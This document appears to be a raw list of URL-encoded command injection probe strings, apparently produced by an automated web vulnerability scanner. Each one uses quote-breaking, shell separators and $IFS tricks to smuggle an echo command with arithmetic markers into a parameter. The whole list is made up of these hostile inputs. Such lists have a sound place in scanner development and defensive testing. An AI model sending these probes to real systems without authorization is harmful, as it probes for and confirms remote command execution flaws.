+%27%26%26echo$IFSMBEHLC$((29%2B30))$(echo$IFSMBEHLC)MBEHLC%7C +%27%7Cecho$IFSKCJERS$((61%2B84))$(echo$IFSKCJERS)KCJERS%7C +%27%7C%7Cecho$IFSUDYXOW$((85%2B10))$(echo$IFSUDYXOW)UDYXOW%7C +%22echo$IFSNYPPVL$((60%2B65))$(echo$IFSNYPPVL)NYPPVL +%22%20echo%20TENJSX$((79%2B73))$(echo%20TENJSX)TENJSX +%22;echo$IFSZRPLSF$((25%2B59))$(echo$IFSZRPLSF)ZRPLSF +%22&echo$IFSMYMGJG$((67%2B19))$(echo$IFSMYMGJG)MYMGJG +%22|echo$IFSFHBVSW$((89%2B96))$(echo$IFSFHBVSW)FHBVSW +%22||echo$IFSXJETQS$((39%2B59))$(echo$IFSXJETQS)XJETQS +%22&&echo$IFSNPVQVS$((92%2B44))$(echo$IFSNPVQVS)NPVQVS +%22%0aecho$IFSGUMDYN$((0%2B81))$(echo$IFSGUMDYN)GUMDYN +%22%3Becho$IFSBXFYAK$((0%2B86))$(echo$IFSBXFYAK)BXFYAK +%22%26echo$IFSAVKDKB$((96%2B57))$(echo$IFSAVKDKB)AVKDKB +%22%26%26echo$IFSQIRZPO$((66%2B91))$(echo$IFSQIRZPO)QIRZPO +%22%7Cecho$IFSDCXXXG$((2%2B46))$(echo$IFSDCXXXG)DCXXXG +%22%7C%7Cecho$IFSAGYUYQ$((68%2B32))$(echo$IFSAGYUYQ)AGYUYQ +%22echo$IFSTXEBDL$((98%2B30))$(echo$IFSTXEBDL)TXEBDL' +%22%20echo%20LSKHTI$((85%2B74))$(echo%20LSKHTI)LSKHTI' +%22;echo$IFSKDCQSI$((18%2B31))$(echo$IFSKDCQSI)KDCQSI' +%22&echo$IFSVYULFC$((89%2B15))$(echo$IFSVYULFC)VYULFC' +%22|echo$IFSYOKEXI$((60%2B52))$(echo$IFSYOKEXI)YOKEXI' +%22||echo$IFSWIGSBP$((63%2B65))$(echo$IFSWIGSBP)WIGSBP' +%22&&echo$IFSZFCQFQ$((13%2B98))$(echo$IFSZFCQFQ)ZFCQFQ' +%22%0aecho$IFSTCCVZI$((1%2B35))$(echo$IFSTCCVZI)TCCVZI' +%22%3Becho$IFSWDYXMD$((62%2B40))$(echo$IFSWDYXMD)WDYXMD' +%22%26echo$IFSLOHVXK$((39%2B85))$(echo$IFSLOHVXK)LOHVXK' +%22%26%26echo$IFSBWWMGD$((16%2B23))$(echo$IFSBWWMGD)BWWMGD' +%22%7Cecho$IFSKVTRBW$((82%2B81))$(echo$IFSKVTRBW)KVTRBW' +%22%7C%7Cecho$IFSYZFWPL$((54%2B79))$(echo$IFSYZFWPL)YZFWPL' +%22echo$IFSGIZFRE$((56%2B79))$(echo$IFSGIZFRE)GIZFRE" +%22%20echo%20BWDHGF$((47%2B6))$(echo%20BWDHGF)BWDHGF" +%22;echo$IFSVBRGVR$((55%2B92))$(echo$IFSVBRGVR)VBRGVR" +%22&echo$IFSKRRDDG$((27%2B70))$(echo$IFSKRRDDG)KRRDDG" +%22|echo$IFSCSECOD$((94%2B97))$(echo$IFSCSECOD)CSECOD" +%22||echo$IFSQCMNBQ$((8%2B12))$(echo$IFSQCMNBQ)QCMNBQ" +%22&&echo$IFSKHRFCH$((77%2B13))$(echo$IFSKHRFCH)KHRFCH" +%22%0aecho$IFSVFVGSF$((75%2B11))$(echo$IFSVFVGSF)VFVGSF" +%22%3Becho$IFSFILOPR$((54%2B95))$(echo$IFSFILOPR)FILOPR" +%22%26echo$IFSRHEKFG$((34%2B24))$(echo$IFSRHEKFG)RHEKFG" +%22%26%26echo$IFSQAQXNJ$((73%2B59))$(echo$IFSQAQXNJ)QAQXNJ" +%22%7Cecho$IFSEKCYEJ$((30%2B67))$(echo$IFSEKCYEJ)EKCYEJ" +%22%7C%7Cecho$IFSPBFHAG$((38%2B37))$(echo$IFSPBFHAG)PBFHAG" +%22echo$IFSXFAZVQ$((31%2B75))$(echo$IFSXFAZVQ)XFAZVQ +%22%20echo%20YKSYRU$((78%2B80))$(echo%20YKSYRU)YKSYRU +%22;echo$IFSPOSWYF$((84%2B58))$(echo$IFSPOSWYF)POSWYF +%22&echo$IFSUTHIQI$((14%2B78))$(echo$IFSUTHIQI)UTHIQI +%22|echo$IFSKEDUES$((72%2B2))$(echo$IFSKEDUES)KEDUES +%22||echo$IFSXQFITQ$((91%2B69))$(echo$IFSXQFITQ)XQFITQ +%22&&echo$IFSUZURTK$((89%2B35))$(echo$IFSUZURTK)UZURTK +%22%0aecho$IFSSROBII$((44%2B41))$(echo$IFSSROBII)SROBII +%22%3Becho$IFSUGGAXQ$((15%2B25))$(echo$IFSUGGAXQ)UGGAXQ +%22%26echo$IFSPXWAWG$((93%2B23))$(echo$IFSPXWAWG)PXWAWG +%22%26%26echo$IFSHIGDVX$((46%2B84))$(echo$IFSHIGDVX)HIGDVX +%22%7Cecho$IFSHASPPT$((51%2B64))$(echo$IFSHASPPT)HASPPT +%22%7C%7Cecho$IFSBKQQRP$((31%2B59))$(echo$IFSBKQQRP)BKQQRP +%22echo$IFSWDFJWS$((72%2B66))$(echo$IFSWDFJWS)WDFJWS// +%22%20echo%20EJENVL$((99%2B67))$(echo%20EJENVL)EJENVL// +%22;echo$IFSOYDJLD$((49%2B19))$(echo$IFSOYDJLD)OYDJLD// +%22&echo$IFSETXJTM$((83%2B22))$(echo$IFSETXJTM)ETXJTM// +%22|echo$IFSPRGTJG$((24%2B21))$(echo$IFSPRGTJG)PRGTJG// +%22||echo$IFSBZQTDK$((6%2B37))$(echo$IFSBZQTDK)BZQTDK// +%22&&echo$IFSCHCIGA$((57%2B69))$(echo$IFSCHCIGA)CHCIGA// +%22%0aecho$IFSWNJDID$((57%2B88))$(echo$IFSWNJDID)WNJDID// +%22%3Becho$IFSQXLDBX$((32%2B84))$(echo$IFSQXLDBX)QXLDBX// +%22%26echo$IFSVNUDZG$((59%2B14))$(echo$IFSVNUDZG)VNUDZG// +%22%26%26echo$IFSWJRXOQ$((50%2B45))$(echo$IFSWJRXOQ)WJRXOQ// +%22%7Cecho$IFSHVKNCE$((69%2B89))$(echo$IFSHVKNCE)HVKNCE// +%22%7C%7Cecho$IFSZCCTFB$((82%2B55))$(echo$IFSZCCTFB)ZCCTFB// +%22echo$IFSWYLAHG$((98%2B68))$(echo$IFSWYLAHG)WYLAHG\ +%22%20echo%20VXREMW$((56%2B44))$(echo%20VXREMW)VXREMW\ +%22;echo$IFSFJALAO$((19%2B27))$(echo$IFSFJALAO)FJALAO\ +%22&echo$IFSZRBHJA$((51%2B20))$(echo$IFSZRBHJA)ZRBHJA\ +%22|echo$IFSMNAWIZ$((59%2B73))$(echo$IFSMNAWIZ)MNAWIZ\ +%22||echo$IFSLTPOTF$((71%2B76))$(echo$IFSLTPOTF)LTPOTF\ +%22&&echo$IFSQUQQGM$((39%2B7))$(echo$IFSQUQQGM)QUQQGM\ +%22%0aecho$IFSLGKPQJ$((93%2B84))$(echo$IFSLGKPQJ)LGKPQJ\ +%22%3Becho$IFSHGTRCU$((62%2B99))$(echo$IFSHGTRCU)HGTRCU\ +%22%26echo$IFSITFACB$((45%2B74))$(echo$IFSITFACB)ITFACB\ +%22%26%26echo$IFSEFRNKR$((8%2B15))$(echo$IFSEFRNKR)EFRNKR\ +%22%7Cecho$IFSTDGCCD$((4%2B88))$(echo$IFSTDGCCD)TDGCCD\ +%22%7C%7Cecho$IFSBVGJOE$((17%2B25))$(echo$IFSBVGJOE)BVGJOE\ +%22echo$IFSKGAXGA$((7%2B86))$(echo$IFSKGAXGA)KGAXGA& +%22%20echo%20KEMGCU$((7%2B98))$(echo%20KEMGCU)KEMGCU& +%22;echo$IFSHZZDKE$((23%2B65))$(echo$IFSHZZDKE)HZZDKE& +%22&echo$IFSMDGOWJ$((0%2B29))$(echo$IFSMDGOWJ)MDGOWJ& +%22|echo$IFSXYSMQM$((74%2B33))$(echo$IFSXYSMQM)XYSMQM& +%22||echo$IFSKOKMSK$((17%2B27))$(echo$IFSKOKMSK)KOKMSK& +%22&&echo$IFSIFCQGE$((84%2B65))$(echo$IFSIFCQGE)IFCQGE& +%22%0aecho$IFSFNPDLF$((30%2B38))$(echo$IFSFNPDLF)FNPDLF& +%22%3Becho$IFSSHWRSB$((43%2B89))$(echo$IFSSHWRSB)SHWRSB& +%22%26echo$IFSPAQLDV$((40%2B74))$(echo$IFSPAQLDV)PAQLDV& +%22%26%26echo$IFSTNKVRD$((74%2B48))$(echo$IFSTNKVRD)TNKVRD& +%22%7Cecho$IFSNNKINL$((7%2B56))$(echo$IFSNNKINL)NNKINL& +%22%7C%7Cecho$IFSACDZIF$((7%2B56))$(echo$IFSACDZIF)ACDZIF& +%22echo$IFSNSPJAR$((7%2B90))$(echo$IFSNSPJAR)NSPJAR| +%22%20echo%20KBNUFV$((78%2B52))$(echo%20KBNUFV)KBNUFV| +%22;echo$IFSRBNXNK$((31%2B22))$(echo$IFSRBNXNK)RBNXNK| +%22&echo$IFSTZXMJD$((12%2B74))$(echo$IFSTZXMJD)TZXMJD| +%22|echo$IFSIQYKZJ$((13%2B97))$(echo$IFSIQYKZJ)IQYKZJ| +%22||echo$IFSTGMYGU$((64%2B59))$(echo$IFSTGMYGU)TGMYGU| +%22&&echo$IFSUTEHBK$((73%2B4))$(echo$IFSUTEHBK)UTEHBK| +%22%0aecho$IFSNPYCHN$((67%2B35))$(echo$IFSNPYCHN)NPYCHN| +%22%3Becho$IFSLWFTCJ$((19%2B88))$(echo$IFSLWFTCJ)LWFTCJ| +%22%26echo$IFSVHAUOY$((79%2B26))$(echo$IFSVHAUOY)VHAUOY| +%22%26%26echo$IFSTNMDEE$((29%2B83))$(echo$IFSTNMDEE)TNMDEE| +%22%7Cecho$IFSEICSZJ$((51%2B32))$(echo$IFSEICSZJ)EICSZJ| +%22%7C%7Cecho$IFSBAKJOM$((61%2B8))$(echo$IFSBAKJOM)BAKJOM| +%22echo$IFSJUCOSG$((27%2B40))$(echo$IFSJUCOSG)JUCOSG%27 +%22%20echo%20HLEPQM$((13%2B16))$(echo%20HLEPQM)HLEPQM%27 +%22;echo$IFSIEYMTU$((1%2B88))$(echo$IFSIEYMTU)IEYMTU%27 +%22&echo$IFSHQDBCP$((68%2B4))$(echo$IFSHQDBCP)HQDBCP%27 +%22|echo$IFSQWZGUZ$((67%2B7))$(echo$IFSQWZGUZ)QWZGUZ%27 +%22||echo$IFSDTOBHC$((30%2B47))$(echo$IFSDTOBHC)DTOBHC%27 +%22&&echo$IFSKGECJW$((94%2B78))$(echo$IFSKGECJW)KGECJW%27 +%22%0aecho$IFSUTHJSW$((11%2B12))$(echo$IFSUTHJSW)UTHJSW%27 +%22%3Becho$IFSTCLHEV$((0%2B38))$(echo$IFSTCLHEV)TCLHEV%27 +%22%26echo$IFSNPBSWH$((19%2B90))$(echo$IFSNPBSWH)NPBSWH%27 +%22%26%26echo$IFSBMSDKL$((25%2B99))$(echo$IFSBMSDKL)BMSDKL%27 +%22%7Cecho$IFSUSGSMP$((39%2B12))$(echo$IFSUSGSMP)USGSMP%27 +%22%7C%7Cecho$IFSZJBERF$((35%2B91))$(echo$IFSZJBERF)ZJBERF%27 +%22echo$IFSJBTZFF$((9%2B76))$(echo$IFSJBTZFF)JBTZFF%22 +%22%20echo%20ZELXMV$((25%2B23))$(echo%20ZELXMV)ZELXMV%22 +%22;echo$IFSCOXAAL$((47%2B23))$(echo$IFSCOXAAL)COXAAL%22 +%22&echo$IFSWFDEUL$((80%2B90))$(echo$IFSWFDEUL)WFDEUL%22 +%22|echo$IFSEYJFJS$((66%2B81))$(echo$IFSEYJFJS)EYJFJS%22 +%22||echo$IFSUMCJZQ$((83%2B7))$(echo$IFSUMCJZQ)UMCJZQ%22 +%22&&echo$IFSTCFOHQ$((83%2B93))$(echo$IFSTCFOHQ)TCFOHQ%22 +%22%0aecho$IFSWVTSGH$((63%2B36))$(echo$IFSWVTSGH)WVTSGH%22 +%22%3Becho$IFSLKBKVH$((78%2B91))$(echo$IFSLKBKVH)LKBKVH%22 +%22%26echo$IFSIETGIV$((33%2B31))$(echo$IFSIETGIV)IETGIV%22 +%22%26%26echo$IFSUDIYDY$((28%2B5))$(echo$IFSUDIYDY)UDIYDY%22 +%22%7Cecho$IFSVOMUAL$((49%2B92))$(echo$IFSVOMUAL)VOMUAL%22 +%22%7C%7Cecho$IFSXHMLVN$((71%2B63))$(echo$IFSXHMLVN)XHMLVN%22 +%22echo$IFSEBQHZC$((54%2B58))$(echo$IFSEBQHZC)EBQHZC%5C%5C +%22%20echo%20DXYHWC$((70%2B59))$(echo%20DXYHWC)DXYHWC%5C%5C +%22;echo$IFSBKQZPW$((40%2B60))$(echo$IFSBKQZPW)BKQZPW%5C%5C +%22&echo$IFSBYMLDE$((27%2B63))$(echo$IFSBYMLDE)BYMLDE%5C%5C +%22|echo$IFSHWGVIM$((90%2B18))$(echo$IFSHWGVIM)HWGVIM%5C%5C +%22||echo$IFSANXKRH$((27%2B96))$(echo$IFSANXKRH)ANXKRH%5C%5C +%22&&echo$IFSZDMIIV$((60%2B55))$(echo$IFSZDMIIV)ZDMIIV%5C%5C +%22%0aecho$IFSECUVPP$((94%2B69))$(echo$IFSECUVPP)ECUVPP%5C%5C +%22%3Becho$IFSXMIXIV$((74%2B96))$(echo$IFSXMIXIV)XMIXIV%5C%5C +%22%26echo$IFSEVHWEV$((99%2B12))$(echo$IFSEVHWEV)EVHWEV%5C%5C +%22%26%26echo$IFSKPOBYP$((90%2B6))$(echo$IFSKPOBYP)KPOBYP%5C%5C +%22%7Cecho$IFSOQPWKQ$((62%2B90))$(echo$IFSOQPWKQ)OQPWKQ%5C%5C +%22%7C%7Cecho$IFSFUISVY$((37%2B75))$(echo$IFSFUISVY)FUISVY%5C%5C +%22echo$IFSPXHSMC$((2%2B51))$(echo$IFSPXHSMC)PXHSMC%2F%2F +%22%20echo%20CCPWJP$((28%2B45))$(echo%20CCPWJP)CCPWJP%2F%2F +%22;echo$IFSPNIBTX$((67%2B98))$(echo$IFSPNIBTX)PNIBTX%2F%2F +%22&echo$IFSQOVIJM$((98%2B90))$(echo$IFSQOVIJM)QOVIJM%2F%2F +%22|echo$IFSNEANFV$((47%2B58))$(echo$IFSNEANFV)NEANFV%2F%2F +%22||echo$IFSKQELND$((18%2B15))$(echo$IFSKQELND)KQELND%2F%2F +%22&&echo$IFSALIQNR$((1%2B51))$(echo$IFSALIQNR)ALIQNR%2F%2F +%22%0aecho$IFSVMXLXF$((85%2B89))$(echo$IFSVMXLXF)VMXLXF%2F%2F +%22%3Becho$IFSEJXJHO$((22%2B15))$(echo$IFSEJXJHO)EJXJHO%2F%2F +%22%26echo$IFSQJRCGM$((21%2B21))$(echo$IFSQJRCGM)QJRCGM%2F%2F +%22%26%26echo$IFSQZIYEJ$((0%2B21))$(echo$IFSQZIYEJ)QZIYEJ%2F%2F +%22%7Cecho$IFSDRZFAI$((10%2B79))$(echo$IFSDRZFAI)DRZFAI%2F%2F +%22%7C%7Cecho$IFSXPSNLK$((16%2B69))$(echo$IFSXPSNLK)XPSNLK%2F%2F +%22echo$IFSYOHOJL$((56%2B39))$(echo$IFSYOHOJL)YOHOJL%26 +%22%20echo%20XXGYFR$((27%2B40))$(echo%20XXGYFR)XXGYFR%26 +%22;echo$IFSHREURS$((4%2B58))$(echo$IFSHREURS)HREURS%26 +%22&echo$IFSWGOXEF$((82%2B13))$(echo$IFSWGOXEF)WGOXEF%26 +%22|echo$IFSVUODLE$((87%2B48))$(echo$IFSVUODLE)VUODLE%26 +%22||echo$IFSQAACSL$((16%2B49))$(echo$IFSQAACSL)QAACSL%26 +%22&&echo$IFSEBZXUY$((79%2B44))$(echo$IFSEBZXUY)EBZXUY%26 +%22%0aecho$IFSGKNCHV$((13%2B8))$(echo$IFSGKNCHV)GKNCHV%26 +%22%3Becho$IFSBYDVLH$((40%2B59))$(echo$IFSBYDVLH)BYDVLH%26 +%22%26echo$IFSUGHPED$((99%2B93))$(echo$IFSUGHPED)UGHPED%26 +%22%26%26echo$IFSJIGDYZ$((64%2B13))$(echo$IFSJIGDYZ)JIGDYZ%26 +%22%7Cecho$IFSWRMIXV$((36%2B74))$(echo$IFSWRMIXV)WRMIXV%26 +%22%7C%7Cecho$IFSGSYMFU$((44%2B78))$(echo$IFSGSYMFU)GSYMFU%26 +%22echo$IFSXVVJRH$((4%2B71))$(echo$IFSXVVJRH)XVVJRH%7C +%22%20echo%20LWNPLT$((96%2B42))$(echo%20LWNPLT)LWNPLT%7C +%22;echo$IFSUOJTRY$((93%2B10))$(echo$IFSUOJTRY)UOJTRY%7C +%22&echo$IFSGVEIAO$((60%2B74))$(echo$IFSGVEIAO)GVEIAO%7C +%22|echo$IFSIJEOUD$((95%2B12))$(echo$IFSIJEOUD)IJEOUD%7C +%22||echo$IFSOJFYUI$((71%2B37))$(echo$IFSOJFYUI)OJFYUI%7C +%22&&echo$IFSCYRNGO$((16%2B47))$(echo$IFSCYRNGO)CYRNGO%7C +%22%0aecho$IFSURWJYQ$((9%2B54))$(echo$IFSURWJYQ)URWJYQ%7C +%22%3Becho$IFSRPJGSG$((43%2B49))$(echo$IFSRPJGSG)RPJGSG%7C +%22%26echo$IFSLJECUX$((80%2B24))$(echo$IFSLJECUX)LJECUX%7C +%22%26%26echo$IFSBQHTLW$((57%2B18))$(echo$IFSBQHTLW)BQHTLW%7C +%22%7Cecho$IFSXVXORA$((57%2B55))$(echo$IFSXVXORA)XVXORA%7C +%22%7C%7Cecho$IFSBNKMZL$((51%2B20))$(echo$IFSBNKMZL)BNKMZL%7C +%7Cecho$IFSOKJGAG$((39%2B76))$(echo$IFSOKJGAG)OKJGAG +%7C%20echo%20HCOMBJ$((69%2B6))$(echo%20HCOMBJ)HCOMBJ +;echo$IFSXAJUQV$((80%2B48))$(echo$IFSXAJUQV)XAJUQV +&echo$IFSOHDHIG$((24%2B5))$(echo$IFSOHDHIG)OHDHIG +|echo$IFSYHJJYR$((16%2B67))$(echo$IFSYHJJYR)YHJJYR +||echo$IFSCGCLSD$((78%2B73))$(echo$IFSCGCLSD)CGCLSD +&&echo$IFSKJOVJF$((86%2B99))$(echo$IFSKJOVJF)KJOVJF +%0aecho$IFSOGNJPF$((26%2B51))$(echo$IFSOGNJPF)OGNJPF +%3Becho$IFSKZGJJF$((9%2B27))$(echo$IFSKZGJJF)KZGJJF +%26echo$IFSDEDUEE$((30%2B57))$(echo$IFSDEDUEE)DEDUEE +%26%26echo$IFSHKWBBD$((73%2B37))$(echo$IFSHKWBBD)HKWBBD +%7Cecho$IFSGZSLCQ$((53%2B35))$(echo$IFSGZSLCQ)GZSLCQ +%7C%7Cecho$IFSJRICXJ$((75%2B92))$(echo$IFSJRICXJ)JRICXJ +echo$IFSHWDYSD$((37%2B57))$(echo$IFSHWDYSD)HWDYSD' +%20echo%20NEBPFW$((3%2B70))$(echo%20NEBPFW)NEBPFW' +;echo$IFSEPLQYO$((94%2B56))$(echo$IFSEPLQYO)EPLQYO' +&echo$IFSTTHLQC$((84%2B38))$(echo$IFSTTHLQC)TTHLQC' +|echo$IFSGKBHIR$((84%2B74))$(echo$IFSGKBHIR)GKBHIR' +||echo$IFSSBWRDD$((13%2B29))$(echo$IFSSBWRDD)SBWRDD' +&&echo$IFSKIKNVD$((50%2B78))$(echo$IFSKIKNVD)KIKNVD' +%0aecho$IFSOFYRTU$((52%2B75))$(echo$IFSOFYRTU)OFYRTU' +%3Becho$IFSJPYDWY$((21%2B37))$(echo$IFSJPYDWY)JPYDWY' +%26echo$IFSXCPZTM$((92%2B95))$(echo$IFSXCPZTM)XCPZTM' +%26%26echo$IFSWOKOCD$((20%2B68))$(echo$IFSWOKOCD)WOKOCD' +%7Cecho$IFSSUUIHX$((40%2B15))$(echo$IFSSUUIHX)SUUIHX' +%7C%7Cecho$IFSAVXTXG$((18%2B58))$(echo$IFSAVXTXG)AVXTXG' +echo$IFSXXONVG$((27%2B27))$(echo$IFSXXONVG)XXONVG" +%20echo%20PFLQEA$((81%2B37))$(echo%20PFLQEA)PFLQEA" +;echo$IFSMDODNG$((16%2B33))$(echo$IFSMDODNG)MDODNG" +&echo$IFSUFORJE$((32%2B39))$(echo$IFSUFORJE)UFORJE" +|echo$IFSBTKIBL$((76%2B11))$(echo$IFSBTKIBL)BTKIBL" +||echo$IFSZVZDHM$((59%2B26))$(echo$IFSZVZDHM)ZVZDHM" +&&echo$IFSLWMKLS$((30%2B88))$(echo$IFSLWMKLS)LWMKLS" +%0aecho$IFSCJKHEO$((35%2B18))$(echo$IFSCJKHEO)CJKHEO" +%3Becho$IFSUSDTON$((86%2B41))$(echo$IFSUSDTON)USDTON" +%26echo$IFSIAHRZI$((77%2B68))$(echo$IFSIAHRZI)IAHRZI" +%26%26echo$IFSONQKZZ$((73%2B7))$(echo$IFSONQKZZ)ONQKZZ" +%7Cecho$IFSYRTPVW$((55%2B57))$(echo$IFSYRTPVW)YRTPVW" +%7C%7Cecho$IFSMXRPLY$((63%2B48))$(echo$IFSMXRPLY)MXRPLY" +echo$IFSBPKGGQ$((2%2B10))$(echo$IFSBPKGGQ)BPKGGQ +%20echo%20EPJLZM$((66%2B41))$(echo%20EPJLZM)EPJLZM +;echo$IFSFRFTEV$((68%2B37))$(echo$IFSFRFTEV)FRFTEV +&echo$IFSNNJHEA$((98%2B76))$(echo$IFSNNJHEA)NNJHEA +|echo$IFSDJRUFH$((97%2B3))$(echo$IFSDJRUFH)DJRUFH +||echo$IFSYXCWNR$((16%2B34))$(echo$IFSYXCWNR)YXCWNR +&&echo$IFSSUKTVK$((49%2B30))$(echo$IFSSUKTVK)SUKTVK +%0aecho$IFSRASFNL$((85%2B74))$(echo$IFSRASFNL)RASFNL +%3Becho$IFSHNITQI$((34%2B44))$(echo$IFSHNITQI)HNITQI +%26echo$IFSFQWXOL$((0%2B18))$(echo$IFSFQWXOL)FQWXOL +%26%26echo$IFSJLTIEA$((92%2B83))$(echo$IFSJLTIEA)JLTIEA +%7Cecho$IFSJFVTNC$((92%2B51))$(echo$IFSJFVTNC)JFVTNC +%7C%7Cecho$IFSOTLHMR$((33%2B79))$(echo$IFSOTLHMR)OTLHMR +echo$IFSRDFLJS$((32%2B99))$(echo$IFSRDFLJS)RDFLJS// +%20echo%20EBRLPU$((95%2B26))$(echo%20EBRLPU)EBRLPU// +;echo$IFSLFANAU$((10%2B58))$(echo$IFSLFANAU)LFANAU// +&echo$IFSASNAHP$((25%2B52))$(echo$IFSASNAHP)ASNAHP// +|echo$IFSYIICFW$((82%2B30))$(echo$IFSYIICFW)YIICFW// +||echo$IFSANCXJL$((61%2B40))$(echo$IFSANCXJL)ANCXJL// +&&echo$IFSKMSEPJ$((48%2B32))$(echo$IFSKMSEPJ)KMSEPJ// +%0aecho$IFSKIZTDU$((42%2B50))$(echo$IFSKIZTDU)KIZTDU// +%3Becho$IFSYTBVMU$((36%2B61))$(echo$IFSYTBVMU)YTBVMU// +%26echo$IFSQOEJNZ$((82%2B42))$(echo$IFSQOEJNZ)QOEJNZ// +%26%26echo$IFSCGEGYR$((45%2B27))$(echo$IFSCGEGYR)CGEGYR// +%7Cecho$IFSEQEOTH$((5%2B24))$(echo$IFSEQEOTH)EQEOTH// +%7C%7Cecho$IFSTGFHRF$((49%2B19))$(echo$IFSTGFHRF)TGFHRF// +echo$IFSOKGHZD$((31%2B37))$(echo$IFSOKGHZD)OKGHZD\ +%20echo%20LHYXBV$((13%2B29))$(echo%20LHYXBV)LHYXBV\ +;echo$IFSOZHGXS$((54%2B58))$(echo$IFSOZHGXS)OZHGXS\ +&echo$IFSQCRUCK$((10%2B80))$(echo$IFSQCRUCK)QCRUCK\ +|echo$IFSJJVJHF$((77%2B32))$(echo$IFSJJVJHF)JJVJHF\ +||echo$IFSVMDOKC$((46%2B15))$(echo$IFSVMDOKC)VMDOKC\ +&&echo$IFSMRIURT$((57%2B24))$(echo$IFSMRIURT)MRIURT\ +%0aecho$IFSDEIFSG$((86%2B72))$(echo$IFSDEIFSG)DEIFSG\ +%3Becho$IFSOIOFGF$((91%2B26))$(echo$IFSOIOFGF)OIOFGF\ +%26echo$IFSOKMGIJ$((46%2B23))$(echo$IFSOKMGIJ)OKMGIJ\ +%26%26echo$IFSBAXLLS$((32%2B52))$(echo$IFSBAXLLS)BAXLLS\ +%7Cecho$IFSHYXPLP$((94%2B38))$(echo$IFSHYXPLP)HYXPLP\ +%7C%7Cecho$IFSARRLJF$((7%2B15))$(echo$IFSARRLJF)ARRLJF\ +echo$IFSUHEKZF$((6%2B76))$(echo$IFSUHEKZF)UHEKZF& +%20echo%20OQWHLF$((94%2B68))$(echo%20OQWHLF)OQWHLF& +;echo$IFSLZAMMD$((45%2B83))$(echo$IFSLZAMMD)LZAMMD& +&echo$IFSXXOEKT$((47%2B54))$(echo$IFSXXOEKT)XXOEKT& +|echo$IFSJEBQGT$((57%2B73))$(echo$IFSJEBQGT)JEBQGT& +||echo$IFSREJVUL$((89%2B39))$(echo$IFSREJVUL)REJVUL& +&&echo$IFSLUKZZL$((74%2B87))$(echo$IFSLUKZZL)LUKZZL& +%0aecho$IFSTMJSKG$((79%2B42))$(echo$IFSTMJSKG)TMJSKG& +%3Becho$IFSNELFTT$((30%2B5))$(echo$IFSNELFTT)NELFTT& +%26echo$IFSIQEANB$((37%2B80))$(echo$IFSIQEANB)IQEANB& +%26%26echo$IFSCJZPXI$((34%2B11))$(echo$IFSCJZPXI)CJZPXI& +%7Cecho$IFSFQIXOT$((96%2B55))$(echo$IFSFQIXOT)FQIXOT& +%7C%7Cecho$IFSUZTFEA$((9%2B38))$(echo$IFSUZTFEA)UZTFEA& +echo$IFSWBZKTL$((54%2B51))$(echo$IFSWBZKTL)WBZKTL| +%20echo%20ZBSMBN$((3%2B0))$(echo%20ZBSMBN)ZBSMBN| +;echo$IFSBISSCY$((69%2B34))$(echo$IFSBISSCY)BISSCY| +&echo$IFSJTCTWE$((47%2B19))$(echo$IFSJTCTWE)JTCTWE| +|echo$IFSVPEXDU$((58%2B80))$(echo$IFSVPEXDU)VPEXDU| +||echo$IFSLYCEOO$((22%2B78))$(echo$IFSLYCEOO)LYCEOO| +&&echo$IFSAOWKBV$((93%2B9))$(echo$IFSAOWKBV)AOWKBV| +%0aecho$IFSZBTJIZ$((28%2B56))$(echo$IFSZBTJIZ)ZBTJIZ| +%3Becho$IFSKSUTZJ$((41%2B59))$(echo$IFSKSUTZJ)KSUTZJ| +%26echo$IFSHAFMRE$((74%2B52))$(echo$IFSHAFMRE)HAFMRE| +%26%26echo$IFSEZIXEG$((12%2B57))$(echo$IFSEZIXEG)EZIXEG| +%7Cecho$IFSJHIHOY$((80%2B94))$(echo$IFSJHIHOY)JHIHOY| +%7C%7Cecho$IFSVZAWQN$((40%2B93))$(echo$IFSVZAWQN)VZAWQN| +echo$IFSXIHMMK$((37%2B0))$(echo$IFSXIHMMK)XIHMMK%27 +%20echo%20AXKFNN$((42%2B98))$(echo%20AXKFNN)AXKFNN%27 +;echo$IFSXRJTLU$((75%2B30))$(echo$IFSXRJTLU)XRJTLU%27 +&echo$IFSHURAOO$((4%2B19))$(echo$IFSHURAOO)HURAOO%27 +|echo$IFSRRFVYH$((99%2B28))$(echo$IFSRRFVYH)RRFVYH%27 +||echo$IFSFHYCZU$((73%2B44))$(echo$IFSFHYCZU)FHYCZU%27 +&&echo$IFSVOFPVM$((35%2B53))$(echo$IFSVOFPVM)VOFPVM%27 +%0aecho$IFSBFBVGP$((41%2B59))$(echo$IFSBFBVGP)BFBVGP%27 +%3Becho$IFSOECCYB$((90%2B42))$(echo$IFSOECCYB)OECCYB%27 +%26echo$IFSUTPJYK$((7%2B24))$(echo$IFSUTPJYK)UTPJYK%27 +%26%26echo$IFSLUCMYV$((14%2B43))$(echo$IFSLUCMYV)LUCMYV%27 +%7Cecho$IFSPVRRTF$((94%2B25))$(echo$IFSPVRRTF)PVRRTF%27 +%7C%7Cecho$IFSEKSDKJ$((57%2B57))$(echo$IFSEKSDKJ)EKSDKJ%27 +echo$IFSFMNKKS$((72%2B97))$(echo$IFSFMNKKS)FMNKKS%22 +%20echo%20BRUWPJ$((24%2B60))$(echo%20BRUWPJ)BRUWPJ%22 +;echo$IFSVBYBZW$((39%2B43))$(echo$IFSVBYBZW)VBYBZW%22 +&echo$IFSLMIPEM$((82%2B21))$(echo$IFSLMIPEM)LMIPEM%22 +|echo$IFSIEVIHG$((35%2B50))$(echo$IFSIEVIHG)IEVIHG%22 +||echo$IFSEULBCJ$((35%2B20))$(echo$IFSEULBCJ)EULBCJ%22 +&&echo$IFSCAAYWG$((20%2B2))$(echo$IFSCAAYWG)CAAYWG%22 +%0aecho$IFSMWSWXL$((58%2B55))$(echo$IFSMWSWXL)MWSWXL%22 +%3Becho$IFSEXIZMZ$((4%2B42))$(echo$IFSEXIZMZ)EXIZMZ%22 +%26echo$IFSCVYZVT$((26%2B52))$(echo$IFSCVYZVT)CVYZVT%22 +%26%26echo$IFSPFGYCN$((54%2B71))$(echo$IFSPFGYCN)PFGYCN%22 +%7Cecho$IFSBKTNUH$((60%2B31))$(echo$IFSBKTNUH)BKTNUH%22 +%7C%7Cecho$IFSCBQMAD$((2%2B96))$(echo$IFSCBQMAD)CBQMAD%22 +echo$IFSKVWOUC$((99%2B55))$(echo$IFSKVWOUC)KVWOUC%5C%5C +%20echo%20RSFFRY$((9%2B19))$(echo%20RSFFRY)RSFFRY%5C%5C +;echo$IFSNCMFZS$((89%2B41))$(echo$IFSNCMFZS)NCMFZS%5C%5C +&echo$IFSBMZKTX$((63%2B94))$(echo$IFSBMZKTX)BMZKTX%5C%5C 